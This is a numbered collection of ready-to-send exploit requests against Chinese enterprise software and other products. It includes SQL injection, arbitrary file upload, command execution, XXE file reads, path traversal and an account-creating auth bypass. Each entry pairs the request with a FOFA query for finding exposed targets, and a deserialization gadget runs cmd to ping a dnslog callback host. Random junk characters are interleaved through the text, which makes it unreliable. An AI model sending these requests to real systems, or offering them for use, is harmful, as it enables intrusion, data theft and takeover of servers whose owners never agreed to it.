& r+ U3 b0 L& r2 E( N2 {% j "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
+ t) U. u$ @. H3 U9 b. } "MethodName":"Start",+ {* o3 P' [, c+ U
"ObjectInstance":{9 P7 }( g8 ?2 L. ~7 D: i
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* l/ ~* x" Q" `. Z# }& M( ]
"StartInfo": {9 Z2 y. P& I& R
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 \( c+ t5 e8 s* M m "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
4 O, t/ X- q6 q/ J }
! Y! [' A+ b. |$ d# y r }
! z7 u& f( w+ h }
Y0 p' r+ t6 ^ ]$ z}
/ v$ @: k3 b( m" z) |; E
0 a( T- r. L: J8 m; O' I* k9 N% B B, k" q+ h1 b6 B1 k
57. 畅捷通T+ keyEdit.aspx SQL注入
0 @/ v e p: @0 e% t e; l! _, rFOFA:app="畅捷通-TPlus"* N4 E) Z1 S$ S2 a# U* Y
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.19 {% i# H" k3 `+ C. b" o
Host: host
6 k3 m) I& ]1 J8 L& d. b% ZUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 r w5 ^! N$ o2 n$ d+ X: D
Accept-Charset: utf-85 g" }3 y( H- h5 T! o8 r' K& k9 p. ?8 h
Accept-Encoding: gzip, deflate
, m* _1 R7 w4 h/ P6 BConnection: close
2 \# p! n! w% _% ^: B* i4 v- S9 [1 m% [% ?7 q! u. b) R" e
7 H7 S) z# u' a, M. @) d. h3 n
58. 畅捷通T+ KeyInfoList.aspx sql注入
, Y8 ]9 _! X( J+ f& E2 ]; I# SFOFA:app="畅捷通-TPlus"2 a- N4 Z! u4 x* e
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1* j/ R& u& e$ F/ @! l$ M
Host: your-ip
+ P3 W& Z* r2 QUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
7 ^& ]2 }; [2 T( Z2 r# lAccept-Charset: utf-8
, x8 E6 H7 [9 ^+ I) XAccept-Encoding: gzip, deflate( [/ X5 f4 N. D- k" V( A6 |5 j; S
Connection: close
, }, S. `5 `* M3 y& W0 \5 E8 G' n2 A6 o2 G9 D+ t0 T- T* @
! s7 q1 t/ `/ j( ]
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
& |8 L5 H- ?) E" [5 z& w( M9 ?" ?FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"5 x3 z& c0 J- s: w( E) N
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
. a" V6 @3 c; c0 T& pHost: 192.168.86.128:9090
+ X' Q4 I5 `+ R8 y: x. A A3 E; [User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
6 G( v2 a( m0 y% u( B; \0 g0 W( Z4 hConnection: close
! g/ T3 V5 n( t1 ^3 N8 I% wContent-Length: 1669. _& J0 s7 a v7 ~! f" A
Accept: */*
! _/ v- b4 g2 O& B) o" f3 _. _' `# cAccept-Language: en
* _, E# C h1 I; `3 I, [ w! i3 FContent-Type: application/x-www-form-urlencoded
V0 K: G" c/ W% \7 ~2 ?Accept-Encoding: gzip
! q3 ^+ w+ a* J7 H& A& N$ u7 W( z; I. X0 Z; q- R
PAYLOAD
6 J7 v3 W& _) L( O+ H1 H# v& d: G1 A
/ E0 b, r- a. k$ X5 Q( i60. 百卓Smart管理平台 importexport.php SQL注入
" ^) V2 q U% J* D$ j2 jFOFA:title="Smart管理平台"- E% m- Q% m# D' x: @( J
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
* r! V( [; ^- E+ r, \Host:
" V3 q" ]+ d# P& U4 T! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 D; f7 A/ C3 K4 J! m* ?5 J2 \+ M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 Y4 J5 S3 z' T0 ^9 a0 ]' i* f, s* QAccept-Encoding: gzip, deflate! q, c! k( L, D1 k3 P) ]. U) z
Accept-Language: zh-CN,zh;q=0.9
+ ^5 A, a. f# b$ I3 C- ^: QConnection: close
2 R9 b6 p" K+ Y8 Q5 g
4 |. K( t4 |( f9 [1 D- ~1 z7 z
+ h, ~! z2 R- Y$ B61. 浙大恩特客户资源管理系统 fileupload 任意文件上传' m }- R/ s! M6 W" V/ P" m8 X$ B# S' N
FOFA: title="欢迎使用浙大恩特客户资源管理系统"& H3 E9 S# m/ R" Y# ^6 |* E+ t
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1; n$ W1 N! L9 l7 z; X2 E, w
Host: x.x.x.x# @) U* i+ N& l5 Q& T& F" Q/ ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, e5 V& Z: X' P$ QConnection: close8 [* D# \) H, V
Content-Length: 27
5 a4 n/ P( y' s+ e/ eAccept: */*
4 u9 f; s: l6 J& G. g/ y7 GAccept-Encoding: gzip, deflate0 J/ I9 k% }2 ~+ ^. n) }4 V
Accept-Language: en
9 Y; _3 n$ \5 R3 }# R$ KContent-Type: application/x-www-form-urlencoded
0 ~; I2 z- W+ A. q, F! f
6 @6 r' R; s" ^$ |1 d8uxssX66eqrqtKObcVa0kid98xa) J' ^( @- T5 R( J, _
1 `; L3 W" y6 l
% @/ \: d" P2 b' F; b1 [62. IP-guard WebServer 远程命令执行
5 t& _. Z3 Q& s: S( RFOFA:"IP-guard" && icon_hash="2030860561"8 y! N5 b( y! y! K) Q
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ x! T/ W* J- @: w" A9 W) M
Host: x.x.x.x
/ x/ N; `! P/ VUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36$ M5 N# }; [* e; S
Connection: close
% U, }3 Z3 j" S7 aAccept: */*
2 c: ^' e6 v" d. L! O* B+ ^Accept-Language: en
1 H6 `6 [, B3 R: XAccept-Encoding: gzip
+ l/ }& b+ R) |% e9 a; f c0 c
1 m! ?+ }* `1 a2 a, ^0 B n4 V' ?! `5 ?
访问
6 p* l- f. K9 X2 _, \! o4 | F" e1 G. K
" L* _- ^; o1 R7 J9 d+ h1 [GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1, C8 H9 T& `: L3 b
Host: x.x.x.x( B3 f; z: u# j( d3 f# r
! a+ Y% M2 g) o% O3 S. f
* R% X& G4 }6 ?5 m63. IP-guard WebServer任意文件读取
4 O+ Z) r, d& A8 SIP-guard < 4.82.0609.0
1 x6 g0 l c0 G. z ?7 p, C. fFOFA:icon_hash="2030860561"
6 U" g+ }) _- p+ k. j7 R1 jPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.16 U' N9 _! }1 x+ b8 H
Host: your-ip
+ ]. W% x; `, Z. K5 g9 q2 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! x# P3 r: D2 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" z2 ?/ u' Q+ lAccept-Encoding: gzip, deflate
( B+ E8 U/ d" E% xAccept-Language: zh-CN,zh;q=0.97 r8 r& K* R3 O* B& _
Connection: close# _5 ^4 |+ o8 `4 c* N' Q& X1 I
Content-Type: application/x-www-form-urlencoded
$ P2 I% C. q4 {# j- @' v# z$ _( k0 ~. a! J2 x* e
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
L5 R5 R4 [- x/ ]7 F$ J; H) c: m* f; c) m
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
$ U% Y1 N+ P4 B$ e7 i( tFOFA:body="/Scripts/EnjoyMsg.js"; P4 Z6 C. q/ {8 r, C& o
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1$ T, b2 t5 ^2 p; N4 H: D0 I
Host: 192.168.86.128:9001; k) N2 L9 W3 b1 W& E& z( C! y
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36- [3 G2 o' f) o2 \ B* S3 e$ j$ g
Connection: close
2 f; l3 Z* R6 Q eContent-Length: 369
; N( W+ t* o) Q% B! [: ^Accept: */*
. r' X/ j" m8 P5 RAccept-Language: en4 b! {! b. R# ?1 J4 a* W
Content-Type: text/xml; charset=utf-8( Z! p& ~( [8 n8 u; F
Accept-Encoding: gzip
" A8 ^1 p4 t: u# c# w; {5 E
' D# w( X2 r! v4 u$ E [<?xml version="1.0" encoding="utf-8"?>
* w5 l5 D+ }) X<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 F& E* ]4 N- ^- ~& P
<soap:Body>% q, h/ q. K; ^& X6 Y. M
<GetOSpById xmlns="http://tempuri.org/">8 N! s- M1 i/ ~2 ~
<sId>1';waitfor delay '0:0:5'--+</sId>8 P J; Q- S, B# y, G( z
</GetOSpById>
* ]9 g" x( q8 O </soap:Body>
" s6 c/ ^" V) P5 E</soap:Envelope>
7 W& ]" ~( G% f7 d2 b& O: F5 m. F1 y5 G6 c/ s! y6 y* b
; A1 a( i$ ]. }1 ^4 ^
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过7 ?7 w, m5 U: k
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台". R6 A ?9 L) M+ s# p
响应200即成功创建账号test123456/1234560 k B" f9 T" d5 z1 @
POST /SystemMng.ashx HTTP/1.1
; g+ R! ` v' f5 \& ?Host:
; F) B* d p. Y8 vUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2 q- i5 c% N- x3 P& J5 r6 rAccept-Encoding: gzip, deflate
! Y0 U h: s* Y* a: D6 \0 iAccept: */*
+ x+ k! n9 U3 z3 I5 P5 Y& \Connection: close! u J/ B: ?- \5 z0 `
Accept-Language: en; k8 v% w! q# M& t
Content-Length: 174$ u" [# a1 i4 b6 a
0 S9 G# U4 _. E, v* v( i4 KoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
0 X, q; C: ?+ e! ?
' V" h1 t6 r4 j* R' V# z" q- B
; x5 r% c4 C. M66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
6 c! J1 B- n; {# DFOFA:app="万户ezOFFICE协同管理平台"
4 O( h' N. T0 W. v% f, n% x* G7 H* E1 z, d5 u/ {
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1( O/ l0 h; S/ C
Host: x.x.x.x) E& g8 x- Z) r% E0 l& ? ?; B. H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
# a# h( D7 Q. ]: QConnection: close" z" s" U; o# _* d) f
Accept: */*
- V2 s l. l) XAccept-Language: en/ c4 Q* ]! u% s6 L1 z1 L$ @3 ?
Accept-Encoding: gzip* p3 i% s/ @ N: X$ `5 j
* g; t& P: H- Z$ }0 X% E
( y- [( h( O' Y, k第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
+ B9 @8 ^- W; ^. m$ B, W& ^
/ o3 Z3 }. ~* t3 L1 ^6 |4 m9 [6 q67. 万户ezOFFICE wpsservlet任意文件上传
! T4 o- Q/ h2 yFOFA:app="万户网络-ezOFFICE"
7 w: q9 h9 x; m( t5 RnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型% a- |0 ~7 c! j+ t
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
) P9 S' p0 g8 V- Z* z1 q7 H( wHost: x.x.x.x! C5 ]0 |! z! ?# s% `1 u+ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
$ ^3 Y# u$ f: u% k/ K* l5 J9 IContent-Length: 173' N2 B. u! D: b5 o% K; R5 l. A2 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.83 Q( J, F, H h6 Y5 U8 e( Z# {
Accept-Encoding: gzip, deflate z4 N- J5 T( x1 K! f# {
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
" o5 z0 y6 z; R& bConnection: close
+ K( [1 F, X \; G. P' Q) f+ `" kContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
7 r* F7 Y1 E: BDNT: 1
9 t+ ^ Y" ~. w4 v0 [, n8 c* OUpgrade-Insecure-Requests: 1
( G' H3 V: a. Z3 u8 g/ `7 p/ m$ l9 K2 [5 e
--ufuadpxathqvxfqnuyuqaozvseiueerp/ K& G$ _/ f* n% E) J7 v
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
! ~' o( g( z' c7 A1 O2 Y1 W* }% C8 d
- e7 C I2 P; e% {<% out.print("sasdfghjkj");%>
+ U4 o- a4 j/ Q$ d1 S4 `--ufuadpxathqvxfqnuyuqaozvseiueerp--
* B& v5 i# P* L4 b$ j" v' h% n$ l- c5 c; l
) L2 u3 P6 h' X/ \
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp! R+ A/ Z5 w+ `: H7 P5 W
; Z# O! \( f+ t: f- W
68. 万户ezOFFICE wf_printnum.jsp SQL注入! [, k4 H D0 d" D
FOFA:app="万户ezOFFICE协同管理平台"
0 Z0 C$ _( y hGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" ^- F T% z* ?/ F
Host: {{host}}
: p9 f5 K* B# Q3 Q7 Q# ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36+ N8 @3 t, D/ K
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.80 n3 N8 i* z J, i
Accept-Encoding: gzip, deflate3 T; B' {7 J9 x2 p: R
Accept-Language: zh-CN,zh;q=0.9# y( ~7 p: W( [8 ^
Connection: close
& C k5 V: ^5 `# i3 p3 \. ], S% B
8 g, s7 m y+ f- M) V _; a& @8 T' o
4 P+ u- ^ t: q69. 万户 ezOFFICE contract_gd.jsp SQL注入# g- |) m& p, w. \
FOFA:app="万户ezOFFICE协同管理平台"
3 W! f7 x/ c/ y* R' H$ ~5 [GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.13 K: L% z; r8 j6 ^" V
Host: your-ip
1 g; z* Z' q u' s1 CUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36+ K; y- d- R: _; B* V
Accept-Encoding: gzip, deflate0 R, ]4 |' ~; B D
Accept: */*
l% K7 n! G8 z0 H, [Connection: keep-alive
! q. D/ ]2 [3 F/ W; C4 C7 j0 r* H% m/ e$ N; }7 F
}. \. ~! X) k. ?# C70. 万户ezEIP success 命令执行( T8 J. T2 Y# o
FOFA:app="万户网络-ezEIP"; @3 ^* o$ Q7 Z9 b8 t- s
POST /member/success.aspx HTTP/1.1: x; E% t/ X2 z, a5 Z
Host: {{Hostname}}
! Y, d0 p1 M! ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
( B6 G& {1 }0 V7 V0 l; Q7 vSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
: d- }/ V6 [; j- V; z# }) N0 `Content-Type: application/x-www-form-urlencoded
( ^# Y; q/ z2 [0 `6 X( tTYPE: C; t4 b5 a8 ^# a3 f+ g& O
Content-Length: 16702+ J* ^$ F" y A
0 E- A9 W$ o: V* ]* F" b) H6 u
__VIEWSTATE=PAYLOAD t, b7 b' p8 |5 r0 E3 Q% `* M
2 q, }8 Y: V: I. m% t2 H- K" X
+ I {8 H2 [( T- A% P& \; W71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
7 O; h. y0 r3 [' H( lFOFA:body="PM2项目管理系统BS版增强工具.zip"
; m' m( a, Q7 sGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1% Y; \3 f/ l+ T. c3 E- l. o
Host: x.x.x.xx.x.x.x( i/ D- P" }. u" S6 P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: D/ k* I- u3 NConnection: close9 \5 k2 b$ K3 [6 b8 ]; I# }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 e+ G8 z8 P* p# jAccept-Encoding: gzip, deflate
, f7 I2 s |% Q& WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: E. ~, i$ t8 K: x
Upgrade-Insecure-Requests: 17 i+ ]& K- }2 u1 w
4 `; h( y! P, M4 S
' Z D2 ^" G* y72. 致远OA getAjaxDataServlet XXE
6 L8 F! h: t# d0 o- z) Y; tFOFA:app="致远互联-OA"
7 l ~$ K4 y9 b; e# K5 G9 A" Z2 U, pPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
) D/ o- \- ?+ X$ nHost: 192.168.40.131:8099 U/ y2 r$ Y4 J8 B
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
. C+ A0 P- [5 M8 r. z. L% LConnection: close
1 y1 f: T$ [/ c, X* ~8 F. R- p! EContent-Length: 583
& X5 o! f! K( ~Content-Type: application/x-www-form-urlencoded5 A, I) r9 k' a$ ~7 W' X: x7 ~
Accept-Encoding: gzip
6 ?' b) ]6 @- O7 d% w5 w$ n p- r; ~: J
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
/ X) r' u- A! ]6 X' Q
. }3 Y) u% o! b' ]$ E
' q3 M! A9 c- r73. GeoServer wms远程代码执行
: a9 H. m4 D* r( N: I0 nFOFA:icon_hash=”97540678”
; A, i- p6 a- g+ OPOST /geoserver/wms HTTP/1.1. d8 V# o' ~% |
Host:1 Z) k8 D9 q: M6 H. G# U4 C) |. A6 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ L% r( M8 Q5 H% [, ^2 H9 W3 W3 O
Content-Length: 1981
5 s, f. i; \* m. E7 L4 e0 DAccept-Encoding: gzip, deflate
: e0 [% U f% i lConnection: close g' x2 E9 T7 h# m6 `2 b' X
Content-Type: application/xml/ K. X/ ^( |" I- X5 Y2 ?
SL-CE-SUID: 3; k g( e, N5 k
}8 [& a- k8 N3 p9 G6 wPAYLOAD
- M1 r9 U4 Z! x8 J1 l2 I( p4 J: D( C/ w8 \: U. ~+ n2 i( _! E4 a9 K
& U4 [% P8 W3 D# r. X ] y$ i
74. 致远M3-server 6_1sp1 反序列化RCE. g3 g; T' d5 r" q N" I
FOFA:title="M3-Server") B! H# o" v2 D- H' r+ \
PAYLOAD
" ~! z; @- { i# Q& F3 ?+ c# V% u! Q) `% A
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE0 h" E7 E+ d7 z" B
FOFA:app="TELESQUARE-TLR-2005KSH"; A7 e. X. ]& h3 s% X3 y' r
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.17 @: h* B( t) K( o1 |9 q
Host: x.x.x.x+ V$ ?8 t8 W1 i0 s; i+ ^' V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% U* x7 g" j9 G4 v6 v1 ~* lConnection: close
1 r% Y3 q0 K' c! R) B% zAccept: */*
) u: p4 `* [* R; K7 P2 Z; M! o2 QAccept-Language: en/ f5 J) e" t1 E& G% R1 d' }( j
Accept-Encoding: gzip: ~# V) B. b# i! C* ~( \% c: M2 Y
4 `2 u' ]3 ~1 l- L" K9 r: C3 v
; N- V# j4 N) y7 s+ \( I$ z
GET /cgi-bin/test28256.txt HTTP/1.10 m: ^' u3 C, e8 t ?8 [3 |
Host: x.x.x.x0 E$ d' y- [) h/ ]# F
3 U* i4 d% Y# c+ {
3 y: w" {6 K8 v( o$ r8 v
76. 新开普掌上校园服务管理平台service.action远程命令执行
( r1 x) C8 y4 ?6 {FOFA:title="掌上校园服务管理平台"( a4 c- C. v* o. Z! }. W3 C
POST /service_transport/service.action HTTP/1.16 U" f+ }; o! s4 j) t8 V( Q
Host: x.x.x.x* P! i3 F1 c7 p; U( h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
, m' |. H: w# }- {( }9 b! ]1 w) VConnection: close- E8 E V$ D9 p: b. ], E" x
Content-Length: 211* v$ D0 x* m% [: p6 k3 X: w" ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% ^, C7 |% @7 v0 p/ mAccept-Encoding: gzip, deflate; m* h8 |/ r( z2 C3 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 B, C1 \& c2 |Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4" Q9 I1 L H" ?, J% Y& t
Upgrade-Insecure-Requests: 13 C/ T& c8 K( q: h$ C+ T
; N% q8 e1 ?1 C+ B
{
& ^ I* |$ W8 s4 n% I1 v- A( C"command": "GetFZinfo",
& J% F- ^8 h8 x4 k3 t2 ~; W* } "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
6 K* U; r- j; \3 L( S& c2 ? ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
^" `* Q" M; f& a2 g}1 U: m* A1 Q5 q7 y2 n9 t
% `1 g; A. b# F. }. a+ L, p$ ?; y0 H) o( r3 l5 u7 m' I
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.13 A" R8 S0 g. J' S4 P
Host: x.x.x.x6 r2 I2 J5 j- P
2 d0 O$ V; | y3 M! U9 O) i
2 O# A2 V7 [& x4 w
/ l9 o i" E3 m9 U) m4 f) Y77. F22服装管理软件系统UploadHandler.ashx任意文件上传
* |* J, S/ O5 I$ s5 gFOFA:body="F22WEB登陆"
$ D% W# Z1 p) q) XPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
, x4 n, i+ t* lHost: x.x.x.x
2 j! X: e4 H" n' _; r5 i. J! X' KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 B% t( M! [/ F, dConnection: close
$ V& U1 \3 r6 x$ T' eContent-Length: 433
" I( J0 o. x8 H, m; EAccept: */*
6 Z0 p4 W4 R% I# w: qAccept-Encoding: gzip, deflate8 P, D8 k6 Y" S$ V; M: e
Accept-Language: zh-CN,zh;q=0.91 \$ i: ]% \: h, e; e/ v5 ?9 L) ^
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
% @0 f6 L$ Z! m+ H- W, u
B% S7 L+ \3 x) w5 {! P6 G------------398jnjVTTlDVXHlE7yYnfwBoix3 ~7 b) u( n$ g) L( ~7 q' G
Content-Disposition: form-data; name="folder"
3 m* B1 r( D* h# b. L3 ^
+ ~3 c# y4 x0 Q* t/upload/udplog( ^( @* R4 V$ o7 z8 p
------------398jnjVTTlDVXHlE7yYnfwBoix
! v- n7 a0 j5 i5 Z: L- nContent-Disposition: form-data; name="Filedata"; filename="1.aspx"( D6 x. R) o1 H
Content-Type: application/octet-stream
9 N% K. p. i( B _$ \( Y% g
. r5 p2 T x y# p; V4 xhello1234567
' F: ], {7 }0 g& m2 T------------398jnjVTTlDVXHlE7yYnfwBoix
7 r1 P5 _( n" p* S @; B" V7 lContent-Disposition: form-data; name="Upload"3 i; a X! B: r( X9 C
# F3 |; K& b. d1 q( e
Submit Query: t4 ~+ }! g' J) @0 i1 {
------------398jnjVTTlDVXHlE7yYnfwBoix-- B: L' h% B* J( q* ]
& z1 j) `. D1 H7 b5 t
! y5 K4 }% h, i2 H78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
' o9 K! x b6 ?FOFA:icon_hash="2001627082"# Y7 z% `+ c- t% y7 z
POST /Platform/System/FileUpload.ashx HTTP/1.1
) i. a# P2 ^ z/ Z/ c _7 y% SHost: x.x.x.x( D H, C" S: a6 w0 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" D4 k l( x7 o' d) t3 J1 T, zConnection: close
+ c0 E+ M3 m9 @4 G& NContent-Length: 336
: J* n! `( G& Y7 z+ [$ wAccept-Encoding: gzip6 Z$ b' E; k X$ U9 o: ~5 h
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
) i5 g T/ j) y2 Z* R: | k5 l+ E% X# t" d0 ~
------YsOxWxSvj1KyZow1PTsh98fdu6l& R& L! J; G0 Z" m4 g( y
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"3 s! p& \& F4 ^2 s
Content-Type: image/png- _( e2 {: Y) Q! e! ?8 i/ _" x
0 |: B* i5 i8 X* F6 x
YsOxWxSvj1KyZow1PTsh98fdu6l& S1 f u+ A. A/ t: U$ }; Y. e
------YsOxWxSvj1KyZow1PTsh98fdu6l
+ l+ ], e0 i$ kContent-Disposition: form-data; name="target"
- O" ]/ u4 o7 d9 H4 `9 o5 Q1 ]. A- D- g1 Z9 ^& ]4 m% m
/Applications/SkillDevelopAndEHS/5 F) {6 m% I: x: V; J: R0 f' B
------YsOxWxSvj1KyZow1PTsh98fdu6l--
& Y$ v" Y8 E# i" ~5 d& m
P% Q2 H9 ?( V$ P' `6 X% Z* V% U7 I/ p7 d" u$ h* w
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1) `3 V& I/ q) R* u% K7 P
Host: x.x.x.x
